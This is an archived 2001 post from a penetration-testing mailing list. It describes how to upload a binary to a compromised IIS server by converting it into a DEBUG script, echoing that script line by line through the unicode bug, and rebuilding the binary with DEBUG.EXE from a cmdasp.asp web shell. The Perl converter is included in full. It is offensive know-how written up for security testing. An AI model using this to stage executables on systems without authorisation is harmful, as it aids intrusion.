Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [PEN-TEST] exe to txt mobile code conversion

From: ian.vitek () IXSECURITY COM
Date: Fri, 23 Mar 2001 14:07:43 +0100
iXsecurity have written a program that can convert a bin file to a ASCII debug
script (SCR).
This SCR file could then be uploaded, for example with the unicode bug.
cmd /c echo scr-line>>uploadfile.scr
You can then run
DEBUG.EXE <uploadfile.scr
with cmdasp.asp to get the bin file. Yes, this requires a DOS based system.
The debug commad have some limitations.
Can you make files larger than 65535 bytes?

#/usr/bin/perl
# Bin to SCR
$version=1.0;

require 'getopts.pl';
$r = "\n";

Getopts('f:h');
die "\nConverts bin file to SCR script.\
Version $version by Ian Vitek ian.vitek\@ixsecurity.com\
* iXsecurity (formerly Infosec) is hiring in Sweden and United Kingdom   *\
* Mail to: christer.stafferod\@ixsecurity.com.                            *\
\
usage: $0 -f binfile\
\t-f binfile    Bin file to convert to SCR script\
\t              Convert it back with the DOS command\
\t              debug.exe <binfile\
\t-h            This help\n\n" if ( $opt_h || ! $opt_f );

open(UFILE,"$opt_f") or die "Can\'t open bin file \"$opt_f\"\n$!\n";

$opt_f=~/^([^\.]+)/;
$tmpfile=$1 . ".scr";
$scr="n $opt_f$r";
$scr.="a$r";

$n=0;
binmode(UFILE);
while( $tn=read(UFILE,$indata,16) ) {
  $indata=~s/(.)/sprintf("%02x,",ord $1)/seg;
  chop($indata);
  $scr.="db $indata$r";
  $n+=$tn;
}
close(UFILE);

$scr.="\x03$r";
$scr.="rcx$r";
$hn=sprintf("%02x",$n);
$scr.="$hn$r";
$scr.="w$r";
$scr.="q$r";

open(SCRFILE,">$tmpfile");
print SCRFILE "$scr";
close(SCRFILE);
Previous By Date Next
Previous By Thread Next

Current thread: